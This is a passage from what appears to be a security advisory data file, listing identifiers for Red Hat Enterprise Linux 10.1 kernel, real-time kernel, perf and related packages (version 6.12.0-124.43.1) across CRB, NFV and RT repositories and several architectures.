"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
